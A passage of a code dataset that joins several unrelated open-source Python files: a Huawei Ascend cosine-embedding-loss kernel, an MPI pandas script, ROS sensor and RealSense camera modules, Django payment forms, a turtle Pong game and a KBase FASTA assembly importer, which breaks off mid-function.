cosine_embedding_loss operator's calculation process\n\n Parameters\n ----------\n x1: TVM tensor\n the placeholder of x1 input data\n x2: TVM tensor\n the placeholder of x2 input data\n target: TVM tensor\n the placeholder of target input data\n output_y: TVM tensor\n the placeholder of beta output data\n x_shape_broadcat: list,\n x1 and x2 broadcast shape\n tgt_shape_broadcast: list\n x and target broadcast shape\n margin: float\n margin, default value is \"0.0\"\n reduction: str\n string indicate reduce method, default value is \"mean\"\n kernel_name: str\n cce kernel name, default value is \"group_norm\"\n\n Returns\n -------\n res: TVM tensor\n \"\"\"\n cce_plat = cceconf.get_soc_spec('SOC_VERSION')\n cast_dtype = 'float32'\n epsilon = tvm.const(1e-12, dtype=\"float32\")\n\n if cce_plat == 'Ascend310':\n cast_dtype = 'float16'\n epsilon = tvm.const(5e-8, dtype=\"float16\")\n\n if x1.dtype.lower() != cast_dtype and x1.dtype.lower() != 'float32':\n x1 = te.lang.cce.cast_to(x1, cast_dtype)\n\n if x2.dtype.lower() != cast_dtype and x2.dtype.lower() != 'float32':\n x2 = te.lang.cce.cast_to(x2, cast_dtype)\n\n target = te.lang.cce.cast_to(target, x1.dtype)\n\n x1_broadcast = te.lang.cce.broadcast(x1, x_shape_broadcat)\n x2_broadcast = te.lang.cce.broadcast(x2, x_shape_broadcat)\n target_broadcast = te.lang.cce.broadcast(target, tgt_shape_broadcast)\n\n # DSL description for cosine similarity compute\n prod = te.lang.cce.vmul(x1_broadcast, x2_broadcast)\n\n mag1 = te.lang.cce.vmul(x1_broadcast, x1_broadcast)\n mag2 = te.lang.cce.vmul(x2_broadcast, x2_broadcast)\n mag_square1 = te.lang.cce.sum(mag1, axis=1)\n mag_square2 = te.lang.cce.sum(mag2, axis=1)\n\n x1_epsilon = te.lang.cce.vadds(mag_square1, epsilon)\n x2_epsilon = te.lang.cce.vadds(mag_square2, epsilon)\n x1_sqrt = te.lang.cce.vsqrt(x1_epsilon)\n x2_sqrt = te.lang.cce.vsqrt(x2_epsilon)\n mode_num = te.lang.cce.vmul(x1_sqrt, x2_sqrt)\n prod_num = te.lang.cce.sum(prod, axis=1)\n cos_res = te.lang.cce.vdiv(prod_num, mode_num)\n\n # DSL description for 1 - cos(x1, x2)\n zero_tensor = te.lang.cce.vmuls(target_broadcast, 0)\n one_tensor = te.lang.cce.vadds(zero_tensor, 1)\n\n neg_one_tensor = te.lang.cce.vsub(zero_tensor, one_tensor)\n pos = te.lang.cce.vsub(one_tensor, cos_res)\n\n # DSL description for max(0, cos(x1, x2) - margin)\n margin_const = tvm.const(margin, dtype=\"float32\")\n margin_tensor = te.lang.cce.vmuls(one_tensor, margin_const)\n neg_sub = te.lang.cce.vsub(cos_res, margin_tensor)\n neg = te.lang.cce.vmax(zero_tensor, neg_sub)\n\n # DSL description for output = pos if y == 1 else neg\n output_pos = te.lang.cce.vcmpsel(target_broadcast, one_tensor, 'eq',\n pos, zero_tensor)\n output_neg = te.lang.cce.vcmpsel(target_broadcast, neg_one_tensor, 'eq',\n neg, zero_tensor)\n res = te.lang.cce.vadd(output_pos, output_neg)\n if reduction in ['sum', 'mean']:\n if reduction == 'mean':\n num = reduce(lambda x, y: x * y, tgt_shape_broadcast)\n mean_cof = num ** (-1)\n res = te.lang.cce.vmuls(res, mean_cof)\n res = te.lang.cce.cast_to(res, 'float32')\n\n reduce_axis = [index for index, _ in enumerate(tgt_shape_broadcast)]\n res_sum = te.lang.cce.sum(res, axis=reduce_axis)\n return res_sum\n\n return te.lang.cce.cast_to(res, 'float32')\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\n@util.check_input_type(dict, dict, dict, dict, float, str, str)\ndef cosine_embedding_loss(input_x1, input_x2, target, y,\n margin=0, reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n algorithm: cosine_embedding_loss\n cosine embedding loss = // 1-cos(x1, x2), if y == 1\n \\\\ max(0, cos(x1, x2) - margin), if y == -1\n Note that the size of 5D Tensors are defined by \"NC1HWC0\".\n The input tensor's dimension C should be equal.\n\n Parameters\n ----------\n x1: dict\n dict of input x1, A Tensor for input data.\n x2: dict\n dict of input x1, A Tensor for input data.\n target: dict\n dict of target, A Tensor for target, include 1 and -1.\n output_y: dict\n dict of output, A Tensor for output\n margin: float\n float of margin, A float number subtracted when y == -1\n reduction: str\n str of output reduce method.\n kernel_name: str\n kernel name, default value is \"cosine_embedding_loss\"\n\n Returns\n -------\n None\n \"\"\"\n shape_x1 = input_x1.get(\"shape\")\n dtype_x1 = input_x1.get(\"dtype\")\n input_dtype_x1 = dtype_x1.lower()\n shape_x2 = input_x2.get(\"shape\")\n dtype_x2 = input_x2.get(\"dtype\")\n input_dtype_x2 = dtype_x2.lower()\n shape_tgt = target.get(\"shape\")\n dtype_tgt = target.get(\"dtype\")\n target_dtype = dtype_tgt.lower()\n\n util.check_kernel_name(kernel_name)\n x_shape_broadcat, tgt_shape_broadcast, shape_x1, shape_x2, shape_tgt = \\\n _shape_check(shape_x1, shape_x2, shape_tgt)\n _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction)\n\n data_input1 = tvm.placeholder(shape_x1, name=\"data_input1\",\n dtype=input_dtype_x1)\n data_input2 = tvm.placeholder(shape_x2, name=\"data_input2\",\n dtype=input_dtype_x2)\n data_target = tvm.placeholder(shape_tgt, name=\"data_target\",\n dtype=target_dtype)\n\n res = cosine_embedding_loss_compute(data_input1, data_input2, data_target,\n y, x_shape_broadcat,\n tgt_shape_broadcast, margin, reduction,\n kernel_name)\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n\n config = {\n \"name\": kernel_name,\n \"tensor_list\": [data_input1, data_input2, data_target, res],\n }\n\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/cosine_embedding_loss.py","file_name":"cosine_embedding_loss.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16509892528","text":"from mpi4py import MPI\nimport pandas as pd\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\ndf = pd.read_csv('../dataset/datos.csv', delimiter = ';', encoding = 'ISO-8859-1')\ndf.head()\n\ndef reduce(num):\n dfR = df.filter(items = [df.columns[num]])\n dfGrouped = dfR.groupby([dfR.columns[0]]).size()\n print(dfGrouped)\n print(\"#####################################\")\n\nif rank == 0:\n comm.send(1, dest = 1) # ciudad\n comm.send(5, dest = 2) # clase\n comm.send(4, dest = 3) # dia\n comm.send(7, dest = 4) # gravedad\n\nif rank == 1:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 2:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 3:\n num = comm.recv(source = 0)\n reduce(num)\n\nif rank == 4:\n num = comm.recv(source = 0)\n reduce(num)\n","repo_name":"sortizs/pr4-hpc","sub_path":"mpi/mpi_acc.py","file_name":"mpi_acc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74267207526","text":"__author__ = 'Bartek'\nfrom .indor_exceptions import ClassPropertyNotFound\nfrom .xml_tree_factory import XmlTreeFactory\nfrom .xml_tree import XmlTree\n\n\nclass XmlTreeRegister(type(XmlTree)):\n def __init__(cls, name, bases, dic):\n cls.property_name_for_printer = 'pretty_name'\n if cls.property_name_for_printer not in dic:\n raise ClassPropertyNotFound(name, cls.property_name_for_printer)\n super(XmlTreeRegister, cls).__init__(name, bases, dic)\n XmlTreeFactory().add_class(name, cls)\n","repo_name":"nokia-wroclaw/innovativeproject-resttest","sub_path":"src/indor/xml_tree_register.py","file_name":"xml_tree_register.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42324065845","text":"#!/usr/bin/env python3\n\nimport ms5837_driver\nimport rospy\nimport time\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom ms5837.msg import ms5837_data\nfrom nav_msgs.msg import Odometry\nimport numpy as np\n\n\n# Choose seawater or freshwater depth calibration using ros param\n# freshwater = 997 kg/m^3\n# seawater = 1029 kg/m^3\n\n# def calculate(array):\n# mean = 0\n# #total = 0\n# if(len(array)>50):\n# array.pop(0)\n# mean = sum(array)\n# mean /= len(array)\n# #for point in array:\n # total += (point - mean) * (point - mean)\n #total /= len(array)\n #print(mean)\n #return mean\n\nclass KalmanFilter:\n\n def __init__(self, max_diff=100, process_noise_matrix=np.array([[0.001, 0.00000001, 0.00000001], [0.00000001, 0.0005, 0.00000001], [0.00000001, 0.00000001, 0.0001]])):\n # initialize the filter with random values\n self.KG = np.ones((3, 3)) # Kalman gain\n self.est = np.zeros((3, 3)) # last estimate (x,v,a)\n self.est_error = np.ones((3, 3)) # Error of the filter estimate\n self.process_noise_matrix = process_noise_matrix\n\n self.last_time = time.time() # for calculating dt\n\n # for sanity check on sensor value\n self.last_x_m = None\n self.max_diff = max_diff # the maximum error between two sensor readings for value to be thrown out\n\n def update(self, x_m, v_m, a_m, x_e, v_e, a_e):\n # pass in measure position, velocity, and acceleration along with error for each\n # check to make sure sensor value has not had catastrophic problem\n if self.last_x_m is None:\n self.last_x_m = x_m\n if abs(x_m - self.last_x_m) > self.max_diff:\n rospy.logerr(\"Sensor value error: change in measurement too large for one time step\")\n else:\n\n # if value is all good then continue to run time step step\n current_time = time.time()\n dt = current_time - self.last_time\n self.last_time = current_time\n\n # create our new estimate based on the model\n self.est = np.matmul(np.array([[1, dt, 1 / 2.0 * dt ** 2], [0, 1, dt], [0, 0, 1]]), self.est) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n rospy.logdebug(self.est)\n self.est_error = self.est_error * [[1, 0, 0], [0, 1, 0], [0, 0, 1]] + self.process_noise_matrix # prevent error from going to zero\n rospy.logdebug(self.est_error)\n\n # update estimate with new sensor values\n self.KG = self.est_error / (self.est_error + np.array([[x_e, 0, 0], [0, v_e, 0], [0, 0, a_e]])) * [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n self.est = self.est + np.matmul(self.KG, np.array([[x_m, 0, 0], [0, v_m, 0], [0, 0, a_m]]) - self.est)\n self.est_error = np.matmul((np.identity(3) - self.KG), self.est_error)\n\n self.last_x_m = x_m\n return self.est, self.est_error\n\n\nif __name__ == '__main__':\n try:\n # set up ros stuff\n data = []\n rospy.init_node('ms5837_node')\n fluid_density = rospy.get_param('~fluid_density', '1000')\n publish_odom = rospy.get_param('~publish_odom', True)\n publish_pose = rospy.get_param('~publish_pose', False)\n use_kalman_filter = rospy.get_param('~use_kalman_filter', False)\n depth_variance = rospy.get_param('~depth_variance', 0.001)\n tf_frame = rospy.get_param(\"~tf_frame\", \"depth_sensor_link\")\n\n pub = rospy.Publisher('rov/ms5837', ms5837_data, queue_size=1)\n rate = rospy.Rate(20) # 100Hz data read\n sensor = ms5837_driver.MS5837_02BA(bus=1) # Default I2C bus is 1 (Raspberry Pi 3)\n # sensor = ms5837.MS5837_02BA()\n\n sensor.setFluidDensity(int(fluid_density))\n time.sleep(1)\n # sensor.init must run immediately after installation of ms5837 object\n sensor.init()\n\n odom_pub = None\n pose_pub = None\n filter = None\n if publish_odom:\n odom_pub = rospy.Publisher(\"/rov/depth_odom\", Odometry, queue_size=1)\n if publish_pose:\n pose_pub = rospy.Publisher(\"/rov/depth_pose\", PoseWithCovarianceStamped, queue_size=1)\n if use_kalman_filter:\n filter = KalmanFilter(100)\n\n last_depth_m = 0 # the last sensor value for computing the velocity\n last_velocity_m = 0 # last velocity for computing acceleration\n last_time = time.time() # time of last read for computing velocity\n\n while not rospy.is_shutdown():\n msg = ms5837_data()\n\n sensor.read(oversampling=0) # maximum read rate of ~90Hz\n\n current_time = time.time()\n dt = current_time - last_time\n last_time = current_time\n\n # measured values for depth, velocity, acceleration\n velocity_m = (sensor.depth() - last_depth_m) / dt\n last_depth_m = sensor.depth()\n acceleration_m = (velocity_m - last_velocity_m) / dt\n last_velocity_m = velocity_m\n\n if use_kalman_filter:\n state, variance = filter.update(sensor.depth(), velocity_m, acceleration_m,\n depth_variance, depth_variance, depth_variance)\n depth = state[0, 0]\n velocity = state[1, 1]\n variance = [variance[0, 0], variance[1, 1]] # position and velocity variance\n else:\n depth = sensor.depth()\n\n velocity = velocity_m\n variance = [depth_variance, depth_variance]\n\n msg.tempC = sensor.temperature(ms5837_driver.UNITS_Centigrade)\n msg.tempF = sensor.temperature(ms5837_driver.UNITS_Farenheit)\n msg.depth = sensor.depth()\n # msg.altitudeM = sensor.altitude() # causes error in driver\n\n # update message headers\n msg.header.stamp = rospy.Time.now()\n msg.header.frame_id = 'depth_data'\n\n pub.publish(msg)\n\n if publish_odom:\n msg = Odometry()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = float(depth)\n data.append(depth)\n # if(len(data) >= 50):\n # msg.pose.pose.position.z = float(calculate(data))\n time_now = time.time()\n msg.twist.twist.linear.z = float(velocity)\n last_time = time_now\n msg.pose.covariance[14] = variance[0]\n msg.twist.covariance[14] = variance[1]\n odom_pub.publish(msg)\n\n if publish_pose:\n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = tf_frame\n msg.header.stamp = rospy.Time.now()\n msg.pose.pose.position.z = 1#sensor.depth() #(float(depth) - 193)\n msg.pose.covariance[14] = variance[0]\n pose_pub.publish(msg)\n\n rate.sleep()\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"MUsurf/Jelly_ROS_22-23","sub_path":"catkin_ws/src/ms5837/src/ms5837_ros.py","file_name":"ms5837_ros.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1477214775","text":"import pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\nclass Realsense_Module():\n WIDTH = 640\n HEIGHT = 480\n FPS = 30\n def __init__(self,device = \"218622271154\") :\n #RGBとdepthの初期設定\n self.conf = rs.config()\n self.conf.enable_device(device)\n #解像度はいくつか選択できる\n self.conf.enable_stream(rs.stream.color, self.WIDTH, self.HEIGHT, rs.format.bgr8, self.FPS)\n self.conf.enable_stream(rs.stream.depth, self.WIDTH, self.HEIGHT, rs.format.z16, self.FPS)\n #stream開始\n self.pipe = rs.pipeline()\n self.profile = self.pipe.start(self.conf)\n #Alignオブジェクト生成(位置合わせのオブジェクト)\n self.align_to = rs.stream.color\n self.align = rs.align(self.align_to)\n #カメラ情報の取得(内パラ)\n self.depth_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.depth)).get_intrinsics()\n self.color_intrinsics = rs.video_stream_profile(self.profile.get_stream(rs.stream.color)).get_intrinsics()\n\n def obtain_camera_prame(self):\n R=[self.color_intrinsics.fx,\n self.color_intrinsics.fy,\n self.WIDTH/2,\n self.HEIGHT/2\n ]\n return R\n\n def obtain_cam_image(self) :\n try :\n #フレーム待ち(これがないとデータの取得にエラーが出ることがあるらしい)\n frames = self.pipe.wait_for_frames()\n # get_frame_data\n aligned_frames = self.align.process(frames)\n color_frame = aligned_frames.get_color_frame()\n depth_frame = aligned_frames.get_depth_frame()\n depth_frame = self.depth_filter(depth_frame)\n if not depth_frame or not color_frame:\n return\n #dataがunit16の形で入っているのでnumpy配列に変更\n color_image = np.asanyarray(color_frame.get_data())\n depth_image = np.asanyarray(depth_frame.get_data())\n img_flag=True\n return color_image,depth_image,depth_frame,img_flag\n except Exception as e :\n print(e)\n color_image=None\n depth_image=None\n depth_frame=None\n img_flag=False\n return color_image,depth_image,depth_frame,img_flag\n\n def obtain_point(self,result_frame,box_result) :\n result_pos=[]\n for u_v in box_result :\n u = int(u_v[0])\n v = int(u_v[1])\n #3次元座標推定\n i_d = result_frame.get_distance(u,v) #距離推定\n point = rs.rs2_deproject_pixel_to_point(self.color_intrinsics , [u,v], i_d) #カメラ座標のx,y取得\n result_pos.append(point)\n return result_pos\n \n def depth_filter(self,depth_frame):\n #TODO recursive median filterを入れる\n # decimarion_filterのパラメータ\n decimate = rs.decimation_filter()\n decimate.set_option(rs.option.filter_magnitude, 1)\n # spatial_filterのパラメータ\n spatial = rs.spatial_filter()\n spatial.set_option(rs.option.filter_magnitude, 1)\n spatial.set_option(rs.option.filter_smooth_alpha, 0.25)\n spatial.set_option(rs.option.filter_smooth_delta, 50)\n # hole_filling_filterのパラメータ\n hole_filling = rs.hole_filling_filter()\n # disparity\n depth_to_disparity = rs.disparity_transform(True)\n disparity_to_depth = rs.disparity_transform(False)\n # filterをかける\n filter_frame = decimate.process(depth_frame)\n filter_frame = depth_to_disparity.process(filter_frame)\n filter_frame = spatial.process(filter_frame)\n filter_frame = disparity_to_depth.process(filter_frame)\n filter_frame = hole_filling.process(filter_frame)\n result_frame = filter_frame.as_depth_frame()\n return result_frame\n\n def limit_area(self,color_image,depth_image,left=0,right=600,top=0,bottom=500):\n lim_colorimage=color_image[left:right,top:bottom,:]\n lim_depth_image=depth_image[left:right,top:bottom]\n return lim_colorimage,lim_depth_image\n\n def shutdown(self):\n self.pipe.stop()\n\n\n","repo_name":"Hibikino-Toms-Robot/image_process","sub_path":"image_node/realsense_setup.py","file_name":"realsense_setup.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31698708414","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom projects.models import Project\nfrom payments.models import Payments\nUser = get_user_model()\n\n# pay project based form\nclass PaymentsProjectForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n class Meta:\n model = Payments\n fields = [\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n\n\n# pay to direct worker form\nclass PaymentWorkerForm(forms.ModelForm):\n receivers = forms.ModelMultipleChoiceField(\n queryset=User.objects.filter(user_type='worker'),\n widget=forms.CheckboxSelectMultiple\n )\n\n class Meta:\n model = Payments\n fields = [\n 'project',\n 'amount',\n 'per_entry',\n 'receivers',\n ]\n widgets = {\n 'project': forms.Select(attrs={'class': 'form-control'}), \n 'amount': forms.NumberInput(attrs={'class': 'form-control'}), \n 'per_entry': forms.NumberInput(attrs={'class': 'form-control'}), \n }\n","repo_name":"alfinarif/project-management-application","sub_path":"payments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70817389927","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.bgcolor(\"#191919\")\nscreen.setup(width=800, height=600)\nscreen.title(\"PyPong\")\nscreen.tracer(0)\n\nr_paddle = Paddle((350, 0))\nl_paddle = Paddle((-350, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(r_paddle.move_up, \"Up\")\nscreen.onkey(r_paddle.move_down, \"Down\")\nscreen.onkey(l_paddle.move_up, \"w\")\nscreen.onkey(l_paddle.move_down, \"s\")\n\ngame_on = True\nwhile game_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n # Collision with top and bottom walls\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n # Collision with paddles\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n # detect misses\n # right player\n if ball.xcor() > 380:\n ball.reset_position()\n scoreboard.l_point()\n\n # left player\n if ball.xcor() < -380:\n ball.reset_position()\n scoreboard.r_point()\n\nscreen.exitonclick()\n","repo_name":"cmlohr/py-pong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8163196434","text":"import json\nimport os\nimport os.path\nfrom pathlib import Path\nimport sys\nimport uuid\nfrom typing import List, Callable\nfrom collections import Counter\nfrom hashlib import md5\n\nfrom Bio import SeqIO\n\nfrom installed_clients.DataFileUtilClient import DataFileUtil\n\n\n_WSID = 'workspace_id'\n_MCL = 'min_contig_length'\n_INPUTS = 'inputs'\n_FILE = 'file'\n_NODE = 'node'\n_ASSEMBLY_NAME = 'assembly_name'\n\n\ndef _upa(object_info):\n return f'{object_info[6]}/{object_info[0]}/{object_info[4]}'\n\nclass FastaToAssembly:\n\n # Note added X due to kb|g.1886.fasta\n _VALID_CHARS = \"-ACGTUWSMKRYBDHVNX\"\n _AMINO_ACID_SPECIFIC_CHARACTERS = \"PLIFQE\"\n def __init__(self,\n dfu: DataFileUtil,\n scratch: Path,\n uuid_gen: Callable[[], uuid.UUID] = lambda: uuid.uuid4()):\n self._scratch = scratch\n self._dfu = dfu\n self._uuid_gen = uuid_gen\n\n def import_fasta(self, params):\n print('validating parameters')\n mass_params = self._set_up_single_params(params)\n return self._import_fasta_mass(mass_params)[0]\n\n def import_fasta_mass(self, params):\n print('validating parameters')\n self._validate_mass_params(params)\n return self._import_fasta_mass(params)\n\n def _import_fasta_mass(self, params):\n # For now this is completely serial, but theoretically we could start uploading\n # Blobstore nodes when some fraction of the initial checks are done, start uploading\n # Workspace obects when some fraction of the Blobstore nodes are done, parallelize\n # the file filtering / parsing, etc.\n # For now keep it simple\n # Also note all the assembly data is kept in memory once parsed, but it contains\n # no sequence info and so shouldn't be too huge. Could push to KBase in batches or\n # save to disk if that's an issue\n # We also probably want to add some retries for saving data, but that should go\n # in DataFileUtils if it's not there already\n # Finally, if more than 1G worth of assembly object data is sent to the workspace at once,\n # the call will fail. May need to add some checking / splitting code around this.\n if _FILE in params[_INPUTS][0]:\n input_files = self._stage_file_inputs(params[_INPUTS])\n else:\n input_files = self._stage_blobstore_inputs(params[_INPUTS])\n\n mcl = params.get(_MCL)\n assembly_data = []\n output = []\n for i in range(len(input_files)):\n # Hmm, all through these printouts we should really put the blobstore node here as\n # well as the file if it exists... wait and see if that code path is still actually\n # used\n if mcl:\n print(f'filtering FASTA file {input_files[i]} by contig length '\n + f'(min len={mcl} bp)')\n input_files[i] = self._filter_contigs_by_length(input_files[i], mcl)\n output.append({'filtered_input': str(input_files[i]) if mcl else None})\n print(f'parsing FASTA file: {input_files[i]}')\n assdata = self._parse_fasta(\n input_files[i],\n params[_INPUTS][i].get('contig_info') or {})\n print(f' - parsed {assdata[\"num_contigs\"]} contigs, {assdata[\"dna_size\"]} bp')\n if not assdata[\"num_contigs\"]:\n raise ValueError(\"Either the original FASTA file contained no sequences or they \"\n + \"were all filtered out based on the min_contig_length \"\n + f\"parameter for file {input_files[i]}\")\n assembly_data.append(assdata)\n\n print('saving assemblies to KBase')\n file_handles = self._save_files_to_blobstore(input_files)\n assobjects = []\n for assdata, file_handle, inputs, sourcefile in zip(\n assembly_data, file_handles, params[_INPUTS], input_files):\n ao = self._build_assembly_object(assdata, file_handle, inputs)\n assobjects.append(ao)\n # this appears to be completely unused\n with open(sourcefile.parent / \"example.json\", \"w\") as f:\n json.dump(ao, f)\n\n # save to WS and return\n assembly_infos = self._save_assembly_objects(\n params[_WSID],\n [p[_ASSEMBLY_NAME] for p in params[_INPUTS]],\n assobjects\n )\n for out, ai in zip(output, assembly_infos):\n out['upa'] = _upa(ai)\n return output\n\n def _build_assembly_object(self, assembly_data, fasta_file_handle_info, params):\n \"\"\" construct the WS object data to save based on the parsed info and params \"\"\"\n assembly_data['assembly_id'] = params[_ASSEMBLY_NAME]\n assembly_data['fasta_handle_ref'] = fasta_file_handle_info['handle']['hid']\n assembly_data['fasta_handle_info'] = fasta_file_handle_info\n\n assembly_data['type'] = 'Unknown'\n if 'type' in params:\n assembly_data['type'] = params['type']\n\n if 'external_source' in params:\n assembly_data['external_source'] = params['external_source']\n\n if 'external_source_id' in params:\n assembly_data['external_source_id'] = params['external_source_id']\n\n if 'external_source_origination_date' in params:\n # TODO this is an arbitrary string, which isn't useful. If this field is actually\n # used, make a new field with a standard timestamp format (epoch date?), validate that\n # format, and deprecate this field\n assembly_data['external_source_origination_date'] = params['external_source_origination_date']\n\n return assembly_data\n\n def _parse_fasta(self, fasta_file_path: Path, extra_contig_info):\n \"\"\" Do the actual work of inspecting each contig \"\"\"\n\n # TODO TEST this needs more extensive unit testing\n # variables to store running counts of things\n total_length = 0\n base_counts = {'A': 0, 'G': 0, 'C': 0, 'T': 0}\n md5_list = []\n\n # map from contig_id to contig_info\n all_contig_data = {}\n\n for record in SeqIO.parse(str(fasta_file_path), \"fasta\"):\n # SeqRecord(seq=Seq('TTAT...', SingleLetterAlphabet()),\n # id='gi|113968346|ref|NC_008321.1|',\n # name='gi|113968346|ref|NC_008321.1|',\n # description='gi|113968346|ref|NC_008321.1| Shewanella sp. MR-4 chromosome, complete genome',\n # dbxrefs=[])\n\n sequence = str(record.seq).upper()\n\n contig_info = {\n 'contig_id': record.id,\n 'name': record.id,\n 'description': record.description[len(record.id):].strip(),\n 'length': len(record.seq)\n }\n\n # 1) compute sequence character statistics running total\n total_length += contig_info['length']\n sequence_count_table = dict(Counter(sequence))\n for character in sequence_count_table:\n if character in base_counts:\n base_counts[character] = base_counts[character] + sequence_count_table[character]\n else:\n base_counts[character] = sequence_count_table[character]\n if character not in self._VALID_CHARS:\n if character in self._AMINO_ACID_SPECIFIC_CHARACTERS:\n raise ValueError('This FASTA file may have amino acids in it instead '\n 'of the required nucleotides.')\n raise ValueError(f\"This FASTA file has non nucleic acid characters: \"\n f\"{character}\")\n\n # 2) record number of 'N' characters (only set if there are some)\n Ncount = 0\n if 'N' in sequence_count_table:\n Ncount = sequence_count_table['N']\n contig_info['Ncount'] = Ncount\n\n # 2b) record if the contig is circular\n # TODO should throw an error if ECI has invalid record IDs\n if record.id in extra_contig_info:\n if 'is_circ' in extra_contig_info[record.id]:\n # TODO supposed to be a boolean, should check for 1 or 0\n contig_info['is_circ'] = int(extra_contig_info[record.id]['is_circ'])\n if 'description' in extra_contig_info[record.id]:\n contig_info['description'] = str(extra_contig_info[record.id]['description'])\n\n # 3) record md5 checksum\n contig_md5 = md5(sequence.encode()).hexdigest()\n contig_info['md5'] = contig_md5\n md5_list.append(contig_md5)\n\n # 4) record the all important GC to ~3 significant digits\n GC_count = 0\n for base in ['G', 'C']:\n if base in sequence_count_table:\n GC_count += sequence_count_table[base]\n contig_info['gc_content'] = round(float(GC_count) / float(contig_info['length']), 5)\n\n # 5) add to contig list\n if contig_info['contig_id'] in all_contig_data:\n raise ValueError('The FASTA header key ' + contig_info['contig_id'] +\n 'appears more than once in the file')\n\n all_contig_data[contig_info['contig_id']] = contig_info\n\n # Aggregate stats for the data\n total_gc_content = None\n if total_length > 0:\n total_gc_content = round(float(base_counts['G'] + base_counts['C']) / float(total_length), 5)\n assembly_data = {\n 'md5': md5(\",\".join(sorted(md5_list)).encode()).hexdigest(),\n 'base_counts': base_counts,\n 'dna_size': total_length,\n 'gc_content': total_gc_content,\n 'contigs': all_contig_data,\n 'num_contigs': len(all_contig_data)\n }\n return assembly_data\n\n @staticmethod\n def _fasta_filter_contigs_generator(fasta_record_iter, min_contig_length):\n \"\"\" generates SeqRecords iterator for writing from a legacy contigset object \"\"\"\n rows = 0\n rows_added = 0\n for record in fasta_record_iter:\n rows += 1\n if len(record.seq) >= min_contig_length:\n rows_added += 1\n yield record\n print(f' - filtered out {rows - rows_added} of {rows} contigs that were shorter '\n f'than {(min_contig_length)} bp.')\n\n def _filter_contigs_by_length(self, fasta_file_path: Path, min_contig_length) -> Path:\n \"\"\" removes all contigs less than the min_contig_length provided \"\"\"\n filtered_fasta_file_path = Path(str(fasta_file_path) + '.filtered.fa')\n\n fasta_record_iter = SeqIO.parse(str(fasta_file_path), 'fasta')\n SeqIO.write(self._fasta_filter_contigs_generator(fasta_record_iter, min_contig_length),\n str(filtered_fasta_file_path), 'fasta')\n\n return filtered_fasta_file_path\n\n def _save_assembly_objects(self, workspace_id, assembly_names, ass_data):\n print('Saving Assemblies to Workspace')\n sys.stdout.flush()\n ws_inputs = []\n for assname, assdata_singular in zip(assembly_names, ass_data):\n ws_inputs.append({\n 'type': 'KBaseGenomeAnnotations.Assembly', # This should really be versioned...\n 'data': assdata_singular,\n 'name': assname\n })\n return self._dfu.save_objects({'id': workspace_id, 'objects': ws_inputs})\n\n def _save_files_to_blobstore(self, files: List[Path]):\n print(f'Uploading FASTA files to the Blobstore')\n sys.stdout.flush()\n blob_input = [{'file_path': str(fp), 'make_handle': 1} for fp in files]\n return self._dfu.file_to_shock_mass(blob_input)\n\n def _stage_file_inputs(self, inputs) -> List[Path]:\n in_files = []\n for inp in inputs:\n if not os.path.isfile(inp[_FILE]):\n raise ValueError(\n \"KBase Assembly Utils tried to save an assembly, but the calling \"\n + f\"application specified a file ('{inp[_FILE]}') that is missing. \"\n + \"Please check the application logs for details.\")\n # Ideally we'd have some sort of security check here but the DTN files could\n # be mounted anywhere...\n # TODO check with sysadmin about this - checked, waiting on clear list of safedirs\n fp = Path(inp[_FILE]).resolve(strict=True)\n # make the downstream unpack call unpack into scratch rather than wherever the\n # source file might be\n file_path = self._create_temp_dir() / fp.name\n # symlink doesn't work, because in DFU filemagic doesn't follow symlinks, and so\n # DFU won't unpack symlinked files\n os.link(fp, file_path)\n in_files.append(file_path)\n # extract the file if it is compressed\n # could add a target dir 